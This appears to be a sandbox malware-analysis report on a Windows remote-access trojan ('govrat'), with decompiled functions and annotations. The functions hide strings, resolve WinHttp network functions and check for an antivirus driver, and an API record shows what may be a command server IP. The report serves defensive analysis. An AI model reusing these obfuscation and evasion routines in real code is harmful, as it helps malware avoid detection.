Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:0xff5e0000
File size:3229696 bytes
MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:low

General

Start time:22:26:42
Start date:10/10/2017
Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ASC.exe'
Imagebase:0x12c0000
File size:6291472 bytes
MD5 hash:882FAC6DFE6E15AEA53D177BE51B7E26
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:low

Disassembly

Code Analysis

    Execution Graph

    Execution Coverage:8.8%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:5.5%
    Total number of Nodes:649
    Total number of Limit Nodes:35

    Graph

21117 958808 __control87 21117->21111 21135 958464 21118->21135 21120 952353 21121 958704 21120->21121 21143 a01fcc 21121->21143 21123 958712 RtlDecodePointer RtlDecodePointer 21124 958732 __input_s_l 21123->21124 21134 958784 21123->21134 21125 95874e 21124->21125 21127 958796 21124->21127 21124->21134 21128 95876e 21125->21128 21129 95875f 21125->21129 21126 95879f RtlEncodePointer RtlEncodePointer 21126->21134 21127->21126 21132 958768 21128->21132 21128->21134 21130 959022 8 API calls 21129->21130 21130->21132 21131 959022 8 API calls 21133 95877e 21131->21133 21132->21128 21132->21131 21132->21134 21133->21134 21134->21117 21136 958479 21135->21136 21138 95848b __amsg_exit 21135->21138 21141 9583a2 8 API calls 6 library calls 21136->21141 21138->21120 21139 95847f 21139->21138 21142 9525d6 8 API calls __amsg_exit 21139->21142 21141->21139 21144->21088 21145->21088 21146 95e5eb 21147 95e5ef 21146->21147 21148 95e61d __freebuf 21146->21148 21149 95e624 CloseHandle 21148->21149 21150 95e62e 21149->21150 21151 96062c CloseHandle 21152 95d184 CloseHandle 21151->21152 21153 96063f 21152->21153 21158 961f7b 9 API calls 21153->21158 21155 960660 21156 960507 ExitProcess 21155->21156 21157 960677 __freebuf 21155->21157 21156->21157 21158->21155 21159 96334d VariantInit 21160 9635f3 21159->21160 21161 9613c5 21163 9613ca 21161->21163 21162 9613f7 21163->21162 21164 95fac9 7 API calls 21163->21164 21165 961446 21164->21165 21166 9601fd 8 API calls 21165->21166 21167 961452 21166->21167 21168 95fb12 7 API calls 21167->21168 21169 96145e 21168->21169 21170 9602b6 15 API calls 21169->21170 21173 96147b 21169->21173 21172 961471 21170->21172 21171 960340 9 API calls 21171->21173 21172->21173 21174 9603c5 17 API calls 21172->21174 21173->21171 21175 961515 21173->21175 21176 961488 RtlExitUserThread 21173->21176 21177 95d184 CloseHandle 21173->21177 21178 960383 9 API calls 21173->21178 21179 9614b8 21173->21179 21174->21173 21176->21173 21177->21173 21178->21173 21180 95d184 
CloseHandle 21179->21180 21181 9614be 21180->21181 21182 96524e 7 API calls 21181->21182 21184 9614c5 21182->21184 21183 9614eb 21188 9614f7 PostMessageW PostMessageW 21183->21188 21184->21175 21184->21183 21185 96106c 16 API calls 21184->21185 21186 9614d8 21185->21186 21187 95d184 CloseHandle 21186->21187 21189 9614e4 21187->21189 21188->21175 21190 960bbc 9 API calls 21189->21190 21190->21183 21191 96125f 21192 961297 __cftof2_l 21191->21192 21193 95fd60 15 API calls 21192->21193 21194 96136c 21193->21194 21195 9510f7 8 API calls 21194->21195 21196 961398 __cftof2_l 21195->21196 21197 961520 21198 961533 21197->21198 21199 961583 21197->21199 21200 9615b5 21199->21200 21201 9615d4 21199->21201 21214 9615a3 21199->21214 21202 9615d9 21200->21202 21203 9615c2 CloseHandle 21200->21203 21201->21202 21205 9615e5 21201->21205 21215 96089d 15 API calls 21202->21215 21203->21202 21206 96160f 21205->21206 21209 961678 21205->21209 21205->21214 21207 961636 CloseHandle CloseHandle 21206->21207 21208 96161e 21206->21208 21210 961656 21207->21210 21211 961728 21209->21211 21209->21214 21212 961740 Sleep 21211->21212 21213 961749 Sleep 21211->21213 21212->21211 21213->21214 21215->21214 21216 9641c3 GetProcAddress GetDiskFreeSpaceExW 21217 9641e2 __freebuf 21216->21217 21218 951195 ___crtLCMapStringA 7 API calls 21217->21218 21219 9642af 21218->21219 21220 9650ab 21219->21220 21221 951000 8 API calls 21219->21221 21222 96502f 21221->21222 21223 951195 ___crtLCMapStringA 7 API calls 21222->21223 21224 965036 __freebuf 21223->21224 21225 953626 RtlEncodePointer RtlEncodePointer RtlEncodePointer RtlEncodePointer 21226 953659 21225->21226 21227 9536c0 21226->21227 21230 953663 RtlDecodePointer 21226->21230 21228 9536ad 21227->21228 21239 95329c TlsFree 21227->21239 21231 953672 21230->21231 21231->21227 21232 958fd6 __input_s_l Sleep 21231->21232 21233 953688 21232->21233 21233->21227 21234 953690 RtlDecodePointer 21233->21234 21235 9536a1 21234->21235 21235->21227 21236 9536a5 
21235->21236 21238 9532d9 8 API calls 2 library calls 21236->21238 21238->21228 21239->21228 21240 960762 21241 96078d 21240->21241 21242 9607fd GetProcAddress FindFirstFileA 21241->21242 21244 9607f6 21241->21244 21243 960823 21242->21243 21245 960827 21242->21245 21246 960889 GetProcAddress 21245->21246 21247 96087f 21245->21247 21248 960895 21246->21248 21247->21246 21248->21243 21249 963e83 GetProcAddress 21251 963e8e __amsg_exit 21249->21251 21250 963f24 GetProcAddress 21252 963f41 21250->21252 21251->21250 21253 951195 ___crtLCMapStringA 7 API calls 21252->21253 21256 9640a2 __amsg_exit 21252->21256 21253->21256 21254 951195 ___crtLCMapStringA 7 API calls 21255 964170 21254->21255 21256->21254 21257 9687ed 21258 9687f1 21257->21258 21259 9636c0 7 API calls 21258->21259 21265 968815 21259->21265 21260 96886b 21261 9603c5 17 API calls 21260->21261 21263 968872 21261->21263 21262 95c931 21 API calls 21262->21265 21264 95ee79 17 API calls 21264->21265 21265->21260 21265->21262 21265->21264 21266 95d184 CloseHandle 21265->21266 21266->21265 21267 961acf 21272 961abf 21267->21272 21268 961ada KiUserCallbackDispatcher 21269 961aeb 21268->21269 21268->21272 21270 961af3 RtlExitUserThread 21269->21270 21271 961b05 21269->21271 21270->21271 21271->21271 21272->21268 21286 95355d 21287 953563 21286->21287 21288 95356c GetProcAddress GetProcAddress GetProcAddress GetProcAddress 21286->21288 21292 95329c TlsFree 21287->21292 21291 9535b6 21288->21291 21290 953568 21292->21290 21273 95d775 21274 95d779 RegQueryValueExW 21273->21274 21284 95d71f __cftof2_l 21273->21284 21275 95d816 RegQueryValueExW 21274->21275 21274->21284 21276 95d8d9 21275->21276 21277 95d8e6 RegQueryValueExW 21275->21277 21276->21277 21276->21284 21278 95d95a __amsg_exit 21277->21278 21277->21284 21279 95d970 RegQueryValueExW 21278->21279 21281 95da28 21279->21281 21280 95dabf 21285 951d71 __input_s_l 7 API calls 21280->21285 21281->21280 21282 95da87 21281->21282 21283 951d71 __input_s_l 7 API calls 
21282->21283 21283->21284 21285->21284

    Executed Functions

    Control-flow Graph (rendered graph omitted; block summary recovered from the edge list)
    • 965b62-965bce: builds L"WinHttp" on the stack and calls 9ccff3; a NULL module handle jumps to 965ebe
    • 965bd4-965e81: thirteen GetProcAddress calls, followed by the first NULL check
    • 965e83-965eb7: the remaining NULL checks on the resolved pointers, each falling through to 965ebe on failure
    • 965ebe: return 0; 965eb9-965ebc: return 1; both leave through 965ec0-965ec5
    C-Code - Quality: 99%
    			E00965B62(void* __ecx, _Unknown_base(*)()** __edi) {
    				short _t134;
    				short _t135;
    				short _t136;
    				short _t137;
    				short _t138;
    				short _t139;
    				struct HINSTANCE__* _t142;
    				void* _t143;
    				_Unknown_base(*)()* _t144;
    				_Unknown_base(*)()* _t146;
    				_Unknown_base(*)()* _t148;
    				_Unknown_base(*)()* _t150;
    				_Unknown_base(*)()* _t152;
    				_Unknown_base(*)()* _t154;
    				_Unknown_base(*)()* _t156;
    				_Unknown_base(*)()* _t158;
    				_Unknown_base(*)()* _t160;
    				_Unknown_base(*)()* _t162;
    				_Unknown_base(*)()* _t164;
    				_Unknown_base(*)()* _t166;
    				_Unknown_base(*)()* _t168;
    				intOrPtr* _t179;
    				void* _t181;
    
    				_t179 = _t181 - 0x78;
    				_t134 = 0x57;
    				 *((short*)(_t179 - 0xb4)) = _t134;
    				_t135 = 0x69;
    				 *((short*)(_t179 - 0xb2)) = _t135;
    				_t136 = 0x6e;
    				 *((short*)(_t179 - 0xb0)) = _t136;
    				_t137 = 0x48;
    				 *((short*)(_t179 - 0xae)) = _t137;
    				_t138 = 0x74;
    				 *((short*)(_t179 - 0xac)) = _t138;
    				 *((short*)(_t179 - 0xaa)) = _t138;
    				_t139 = 0x70;
    				 *((short*)(_t179 - 0xa8)) = _t139;
    				 *((short*)(_t179 - 0xa6)) = 0;
    				_push(_t179 - 0xb4);
    					_t142 = E009CCFF3(_t179 - 0xb4); // executed; argument is the UTF-16 stack string L"WinHttp" assembled above, result is the module handle used by every GetProcAddress below
    				 *(_t179 + 0x74) = _t142;
    				if(_t142 == 0) {
    					L14:
    					_t143 = 0;
    				} else {
    					 *(_t179 - 8) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 4)) = 0x53707474;
    					 *_t179 = 0x52646e65;
    					 *((intOrPtr*)(_t179 + 4)) = 0x65757165;
    					 *((short*)(_t179 + 8)) = 0x7473;
    					 *((char*)(_t179 + 0xa)) = 0;
    					_t144 = GetProcAddress(_t142, _t179 - 8); // executed; the DWORDs above spell "WinHttpSendRequest"
    					 *__edi = _t144;
    					 *(_t179 - 0xa4) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0xa0)) = 0x47707474;
    					 *((intOrPtr*)(_t179 - 0x9c)) = 0x45497465;
    					 *((intOrPtr*)(_t179 - 0x98)) = 0x786f7250;
    					 *((intOrPtr*)(_t179 - 0x94)) = 0x6e6f4379;
    					 *((intOrPtr*)(_t179 - 0x90)) = 0x46676966;
    					 *((intOrPtr*)(_t179 - 0x8c)) = 0x7543726f;
    					 *((intOrPtr*)(_t179 - 0x88)) = 0x6e657272;
    					 *((intOrPtr*)(_t179 - 0x84)) = 0x65735574;
    					 *((short*)(_t179 - 0x80)) = 0x72;
    					_t146 = GetProcAddress( *(_t179 + 0x74), _t179 - 0xa4); // executed; "WinHttpGetIEProxyConfigForCurrentUser"
    					 *(__edi + 4) = _t146;
    					 *(_t179 + 0x34) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x38)) = 0x53707474;
    					 *((intOrPtr*)(_t179 + 0x3c)) = 0x704f7465;
    					 *((intOrPtr*)(_t179 + 0x40)) = 0x6e6f6974;
    					 *((char*)(_t179 + 0x44)) = 0;
    					_t148 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x34); // executed; "WinHttpSetOption"
    					 *(__edi + 8) = _t148;
    					 *(_t179 + 0x20) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x24)) = 0x53707474;
    					 *((intOrPtr*)(_t179 + 0x28)) = 0x69547465;
    					 *((intOrPtr*)(_t179 + 0x2c)) = 0x756f656d;
    					 *((short*)(_t179 + 0x30)) = 0x7374;
    					 *((char*)(_t179 + 0x32)) = 0;
    					_t150 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x20); // executed; "WinHttpSetTimeouts"
    					 *(__edi + 0xc) = _t150;
    					 *(_t179 - 0x60) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x5c)) = 0x52707474;
    					 *((intOrPtr*)(_t179 - 0x58)) = 0x69656365;
    					 *((intOrPtr*)(_t179 - 0x54)) = 0x65526576;
    					 *((intOrPtr*)(_t179 - 0x50)) = 0x6e6f7073;
    					 *((short*)(_t179 - 0x4c)) = 0x6573;
    					 *((char*)(_t179 - 0x4a)) = 0;
    					_t152 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x60); // executed; "WinHttpReceiveResponse"
    					 *(__edi + 0x10) = _t152;
    					 *(_t179 + 0x58) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x5c)) = 0x43707474;
    					 *((intOrPtr*)(_t179 + 0x60)) = 0x656e6e6f;
    					 *((short*)(_t179 + 0x64)) = 0x7463;
    					 *((char*)(_t179 + 0x66)) = 0;
    					_t154 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x58); // executed; "WinHttpConnect"
    					 *(__edi + 0x14) = _t154;
    					 *(_t179 + 0x68) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x6c)) = 0x4f707474;
    					 *((intOrPtr*)(_t179 + 0x70)) = 0x6e6570;
    					_t156 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x68); // executed; "WinHttpOpen" (the NUL is the high byte of 0x6e6570)
    					 *(__edi + 0x18) = _t156;
    					 *(_t179 + 0xc) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x10)) = 0x4f707474;
    					 *((intOrPtr*)(_t179 + 0x14)) = 0x526e6570;
    					 *((intOrPtr*)(_t179 + 0x18)) = 0x65757165;
    					 *((short*)(_t179 + 0x1c)) = 0x7473;
    					 *((char*)(_t179 + 0x1e)) = 0;
    					_t158 = GetProcAddress( *(_t179 + 0x74), _t179 + 0xc); // executed; "WinHttpOpenRequest"
    					 *(__edi + 0x1c) = _t158;
    					 *(_t179 - 0x48) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x44)) = 0x47707474;
    					 *((intOrPtr*)(_t179 - 0x40)) = 0x72507465;
    					 *((intOrPtr*)(_t179 - 0x3c)) = 0x4679786f;
    					 *((intOrPtr*)(_t179 - 0x38)) = 0x7255726f;
    					 *((short*)(_t179 - 0x34)) = 0x6c;
    					_t160 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x48); // executed; "WinHttpGetProxyForUrl"
    					 *(__edi + 0x20) = _t160;
    					 *(_t179 + 0x48) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x4c)) = 0x52707474;
    					 *((intOrPtr*)(_t179 + 0x50)) = 0x44646165;
    					 *((intOrPtr*)(_t179 + 0x54)) = 0x617461;
    					_t162 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x48); // executed; "WinHttpReadData"
    					 *(__edi + 0x24) = _t162;
    					 *(_t179 - 0x1c) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x18)) = 0x43707474;
    					 *((intOrPtr*)(_t179 - 0x14)) = 0x65736f6c;
    					 *((intOrPtr*)(_t179 - 0x10)) = 0x646e6148;
    					 *((short*)(_t179 - 0xc)) = 0x656c;
    					 *((char*)(_t179 - 0xa)) = 0;
    					_t164 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x1c); // executed; "WinHttpCloseHandle"
    					 *(__edi + 0x28) = _t164;
    					 *(_t179 - 0x30) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x2c)) = 0x51707474;
    					 *((intOrPtr*)(_t179 - 0x28)) = 0x79726575;
    					 *((intOrPtr*)(_t179 - 0x24)) = 0x64616548;
    					 *((intOrPtr*)(_t179 - 0x20)) = 0x737265;
    					_t166 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x30); // executed; "WinHttpQueryHeaders"
    					 *(__edi + 0x2c) = _t166;
    					 *(_t179 - 0x7c) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x78)) = 0x41707474;
    					 *((intOrPtr*)(_t179 - 0x74)) = 0x65526464;
    					 *((intOrPtr*)(_t179 - 0x70)) = 0x73657571;
    					 *((intOrPtr*)(_t179 - 0x6c)) = 0x61654874;
    					 *((intOrPtr*)(_t179 - 0x68)) = 0x73726564;
    					 *((char*)(_t179 - 0x64)) = 0;
    					_t168 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x7c); // executed; "WinHttpAddRequestHeaders"
    					 *(__edi + 0x30) = _t168;
    					// every slot of the function table is checked except +0x14 (WinHttpConnect); one unresolved export fails the whole resolver
    					if( *__edi == 0 ||  *(__edi + 4) == 0 ||  *(__edi + 8) == 0 ||  *(__edi + 0xc) == 0 ||  *(__edi + 0x10) == 0 ||  *(__edi + 0x18) == 0 ||  *(__edi + 0x1c) == 0 ||  *(__edi + 0x20) == 0 ||  *(__edi + 0x24) == 0 ||  *(__edi + 0x28) == 0 ||  *(__edi + 0x2c) == 0 || _t168 == 0) {
    						goto L14;
    					} else {
    						_t143 = 1;
    					}
    				}
    				return _t143;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,?,192.243.101.124,00000034,?,00000200), ref: 00965C05
    • GetProcAddress.KERNEL32(?,?), ref: 00965C73
    • GetProcAddress.KERNEL32(?,?), ref: 00965C9E
    • GetProcAddress.KERNEL32(?,?), ref: 00965CCF
    • GetProcAddress.KERNEL32(?,?), ref: 00965D07
    • GetProcAddress.KERNEL32(?,?), ref: 00965D31
    • GetProcAddress.KERNEL32(?,?), ref: 00965D52
    • GetProcAddress.KERNEL32(?,?), ref: 00965D83
    • GetProcAddress.KERNEL32(?,?), ref: 00965DB8
    • GetProcAddress.KERNEL32(?,?), ref: 00965DE0
    • GetProcAddress.KERNEL32(?,?), ref: 00965E11
    • GetProcAddress.KERNEL32(?,?), ref: 00965E40
    • GetProcAddress.KERNEL32(?,?), ref: 00965E79
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph (rendered graph omitted; block summary recovered from the edge list)
    • 960762-96078b: fills the first XOR buffer; 96078d-960796: its decode loop; 960798-9607c6: call 9bff8a
    • 9607c8-9607d1: second decode loop; 9607d3-9607f4: call 97f5e8; 9607f6-9607fc: call 9e886a when the module handle is NULL
    • 9607fd-960821: GetProcAddress and FindFirstFileA; on INVALID_HANDLE_VALUE 960823-960825 returns 0
    • 960827-96087d: two more decode loops (960840, 960866); 96087f-960884: call 9a502a if needed; 960889-960897: GetProcAddress; 960898-96089c: return
    C-Code - Quality: 38%
    			E00960762(char __ebx, void* __ecx, void* __edx, void* __edi) {
    				void* _t51;
    				void* _t56;
    				void* _t59;
    				struct HINSTANCE__* _t61;
    				void* _t63;
    				void* _t64;
    				void* _t65;
    				struct HINSTANCE__* _t67;
    				_Unknown_base(*)()* _t68;
    				void* _t71;
    				CHAR* _t78;
    				intOrPtr* _t82;
    				intOrPtr* _t84;
    				CHAR* _t85;
    				void* _t88;
    
    				 *((intOrPtr*)(_t88 - 5)) = 0x65391617;
    				 *((intOrPtr*)(_t88 - 9)) = 0x130c17;
    				 *((intOrPtr*)(_t88 - 0xd)) = 0x1395756;
    				 *((intOrPtr*)(_t88 - 0x11)) = 0x8001116;
    				 *((short*)(_t88 - 0x13)) = 0x1c16;
    				 *((char*)(_t88 - 0x14)) = 0x39;
    				 *((char*)(_t88 - 1)) = __ebx;
    				_t51 = 0;
    				// XOR-decodes the 19 bytes at ebp-0x14 with key 0x65; the result is "\system32\drivers\"
    				do {
    					 *(_t88 + _t51 - 0x14) =  *(_t88 + _t51 - 0x14) ^ 0x00000065;
    					_t51 = _t51 + 1;
    				} while (_t51 < 0x13);
    				_pop(_t84);
    				L009BFF8A(_t51, __ebx, __ecx, __edi, _t84);
    				 *((char*)(_t88 - 1)) = 1;
    				 *_t84(_t88 - 0x130, _t88 - 0x14);
    				 *((intOrPtr*)(_t88 - 0x1b)) = 0x66151f15;
    				 *((intOrPtr*)(_t88 - 0x1f)) = 0x48000d05;
    				 *((short*)(_t88 - 0x21)) = 0x1007;
    				 *((char*)(_t88 - 0x17)) = __ebx;
    				_t56 = 0;
    				// XOR-decodes the 10 bytes at ebp-0x21 with key 0x66; the result is the driver file name "avckf.sys"
    				do {
    					 *(_t88 + _t56 - 0x21) =  *(_t88 + _t56 - 0x21) ^ 0x00000066;
    					_t56 = _t56 + 1;
    				} while (_t56 < 0xa);
    				 *((char*)(_t88 - 0x17)) = 1;
    				_t59 =  *_t84(_t88 - 0x130, _t88 - 0x21);
    				_pop(_t82);
    				L0097F5E8(_t59, __ebx, __edx, _t82);
    				_t85 = "kernel32";
    				_t61 =  *_t82(_t85);
    				if(_t61 == __ebx) {
    					_push(_t85);
    					return L009E886A(_t61, _t82);
    				}
    				GetProcAddress(_t61, "FindFirstFileA"); // executed
    				_t78 = _t88 - 0x130;
    				_t63 = FindFirstFileA(_t78, _t88 - 0x270); // executed; existence check on the assembled driver path at ebp-0x130, the find data itself is never used
    				 *(_t88 - 0x28) = _t63;
    				if(_t63 != 0xffffffff) {
    					 *((intOrPtr*)(_t88 - 5)) = 0x7510061a;
    					 *((intOrPtr*)(_t88 - 9)) = 0x1936111b;
    					 *(_t88 - 0xb) = 0x1c33;
    					 *((char*)(_t88 - 1)) = __ebx;
    					_t64 = 0;
    					// XOR-decodes the 10 bytes at ebp-0xb with key 0x75; the result is "FindClose"
    					do {
    						 *(_t88 + _t64 - 0xb) =  *(_t88 + _t64 - 0xb) ^ 0x00000075;
    						_t64 = _t64 + 1;
    					} while (_t64 < 0xa);
    					 *((char*)(_t88 - 1)) = 1;
    					 *((intOrPtr*)(_t88 - 0x1b)) = 0x75474619;
    					 *((intOrPtr*)(_t88 - 0x1f)) = 0x101b0710;
    					 *((char*)(_t88 - 0x20)) = 0x1e;
    					 *((char*)(_t88 - 0x17)) = __ebx;
    					_t65 = 0;
    					// XOR-decodes the 9 bytes at ebp-0x20 with key 0x75; the result is "kernel32"
    					do {
    						 *(_t88 + _t65 - 0x20) =  *(_t88 + _t65 - 0x20) ^ 0x00000075;
    						_t65 = _t65 + 1;
    					} while (_t65 < 9);
    					 *((char*)(_t88 - 0x17)) = 1;
    					_t67 =  *_t82(_t88 - 0x20);
    					if(_t67 == __ebx) {
    						_push(_t88 - 0x20);
    						_push(_t78);
    						_t67 = L009A502A(_t88 - 0x20, _t82);
    					}
    					_t68 = GetProcAddress(_t67, _t88 - 0xb); // resolves FindClose from the kernel32 handle obtained above
    					 *_t68( *(_t88 - 0x28)); // FindClose(hFind); the function then reports "driver file present"
    					_t71 = 1;
    				} else {
    					_t71 = 0;
    				}
    				return _t71;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,FindFirstFileA), ref: 00960809
    • FindFirstFileA.KERNELBASE(?,?), ref: 00960819
    • GetProcAddress.KERNEL32(00000000,00000075), ref: 0096088E
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph (rendered graph omitted; block summary recovered from the edge list)
    • 95fe2e-95fe55: fills the first XOR buffer; 95fe57-95fe60: decode loop; 95fe62-95fea7: GetProcAddress and second fill; 95fea9-95feb2: decode loop; 95feb4-95fec5: GetProcAddress
    • either pointer NULL: 95ff3a (return 0) via 95ff3c-95ff40
    • 95fecb-95fedd: K32EnumDeviceDrivers (sizing call); 95fedf-95fee8: call 95c795 (obtains the driver array buffer); 95feea-95fef7: K32EnumDeviceDrivers again
    • 95ff03-95ff31: per-driver loop, K32GetDeviceDriverBaseNameW then call 951c05 (compare); a match leaves through 95ff41-95ff4b (call 95115b, return 1), otherwise 95ff33-95ff39 calls 95115b and returns 0
    C-Code - Quality: 87%
    			E0095FE2E(struct HINSTANCE__* __eax, signed int __ebx) {
    				void* _t45;
    				_Unknown_base(*)()* _t47;
    				void* _t48;
    				_Unknown_base(*)()* _t50;
    				void* _t51;
    				void* _t62;
    				signed int _t65;
    				void* _t67;
    				void* _t71;
    				struct HINSTANCE__* _t72;
    				void* _t74;
    				void* _t79;
    
    				_t65 = __ebx;
    				_t72 = __eax;
    				 *((intOrPtr*)(_t79 - 0x11)) = 0xf2818097;
    				 *((intOrPtr*)(_t79 - 0x15)) = 0x849b80b6;
    				 *((intOrPtr*)(_t79 - 0x19)) = 0x97919b84;
    				 *((intOrPtr*)(_t79 - 0x1d)) = 0x97b69f87;
    				 *(_t79 - 0x1f) = 0x9cb7;
    				 *((char*)(_t79 - 0xd)) = __ebx;
    				_t45 = 0;
    				// XOR-decodes the 18 bytes at ebp-0x1f with key 0xf2; the result is "EnumDeviceDrivers" (logged by the sandbox as K32EnumDeviceDrivers)
    				do {
    					 *(_t79 + _t45 - 0x1f) =  *(_t79 + _t45 - 0x1f) ^ 0x000000f2;
    					_t45 = _t45 + 1;
    				} while (_t45 < 0x12);
    				 *((char*)(_t79 - 0xd)) = 1;
    				_t47 = GetProcAddress(__eax, _t79 - 0x1f); // executed
    				 *(_t79 - 0x40) = _t47;
    				 *((intOrPtr*)(_t79 - 0x24)) = 0xf3a4969e;
    				 *((intOrPtr*)(_t79 - 0x28)) = 0x92bd9680;
    				 *((intOrPtr*)(_t79 - 0x2c)) = 0x92b18196;
    				 *((intOrPtr*)(_t79 - 0x30)) = 0x859a81b7;
    				 *((intOrPtr*)(_t79 - 0x34)) = 0x96909a85;
    				 *((intOrPtr*)(_t79 - 0x38)) = 0x96b78796;
    				 *(_t79 - 0x39) = 0xb4;
    				 *((char*)(_t79 - 0x20)) = __ebx;
    				_t48 = 0;
    				// XOR-decodes the 25 bytes at ebp-0x39 with key 0xf3; the result is "GetDeviceDriverBaseNameW"
    				do {
    					 *(_t79 + _t48 - 0x39) =  *(_t79 + _t48 - 0x39) ^ 0x000000f3;
    					_t48 = _t48 + 1;
    				} while (_t48 < 0x19);
    				 *((char*)(_t79 - 0x20)) = 1;
    				_t50 = GetProcAddress(_t72, _t79 - 0x39); // executed
    				 *(_t79 - 8) = _t50;
    				if( *(_t79 - 0x40) == __ebx || _t50 == __ebx) {
    					L14:
    					_t51 = 0;
    				} else {
    					 *(_t79 - 0x40)(_t79 - 0x44, 4, _t79 - 0xc); // EnumDeviceDrivers(&scratch, 4, &cbNeeded): sizing call only
    					_t77 =  *(_t79 - 0xc);
    					_t88 =  *(_t79 - 0xc) - __ebx;
    					if( *(_t79 - 0xc) == __ebx) {
    						goto L14;
    					} else {
    						_t74 = E0095C795(_t71, _t77, _t88);
    						if(_t74 == __ebx) {
    							goto L14;
    						} else {
    							_push(_t79 - 0x44);
    							_push( *(_t79 - 0xc));
    							_push(_t74); // executed
    							if( *(_t79 - 0x40)() == 0) { // EnumDeviceDrivers(buffer, cbNeeded, &cbNeeded): fills the array of driver image bases
    								L13:
    								E0095115B(_t67, _t71, _t77, _t74);
    								goto L14;
    							} else {
    								_t77 =  *(_t79 - 0xc) >> 2; // number of drivers = cbNeeded / sizeof(LPVOID)
    								if(_t77 > __ebx) {
    									do {
    										_push(0x400);
    										_push(_t79 - 0x844);
    										_push( *((intOrPtr*)(_t74 + _t65 * 4)));
    										if( *(_t79 - 8)() == 0) { // GetDeviceDriverBaseNameW(base[i], name @ ebp-0x844, 0x400)
    											goto L12;
    										} else {
    											_t62 = L00951C05(_t79 - 0x844,  *((intOrPtr*)(_t79 + 8))); // case-insensitive compare (__wcsicoll in the API list) of the driver base name against the caller's string at [ebp+8]
    											_pop(_t67);
    											if(_t62 == 0) {
    												E0095115B(_t67, _t71, _t77, _t74);
    												_t51 = 1;
    											} else {
    												goto L12;
    											}
    										}
    										goto L15;
    										L12:
    										_t65 = _t65 + 1;
    									} while (_t65 < _t77);
    								}
    								goto L13;
    							}
    						}
    					}
    				}
    				L15:
    				return _t51;
    			}

    APIs
    • GetProcAddress.KERNEL32(?,000000F2), ref: 0095FE71
    • GetProcAddress.KERNEL32(?,000000F3), ref: 0095FEBD
    • K32EnumDeviceDrivers.KERNEL32(?,00000004,?,?,000000F3), ref: 0095FED5
    • K32EnumDeviceDrivers.KERNEL32(00000000,?,?,?,000000F3), ref: 0095FEF2
    • K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400,?,000000F3), ref: 0095FF12
    • __wcsicoll.LIBCMT ref: 0095FF23
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
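    Decoding the stack strings above by hand (the DWORD immediates in E00965B62, the XOR-masked buffers in E00960762 and E0095FE2E) is slow and error-prone, so here is an added example, not part of the Joe Sandbox report or of the sample, that recovers them from the decompiler text. It assumes the store syntax exactly as printed in these listings, that offsets are relative to one function's frame temporary (_t179, _t88, _t79), and that each encoded string uses the single-byte key of the `^ 0x000000NN` loop that follows its fill; the embedded snippets are copied from the listings.

```python
"""Recover stack-built strings from the decompiler listings in this report."""
import re

# A constant assigned to a decompiler temporary:  _t134 = 0x57;
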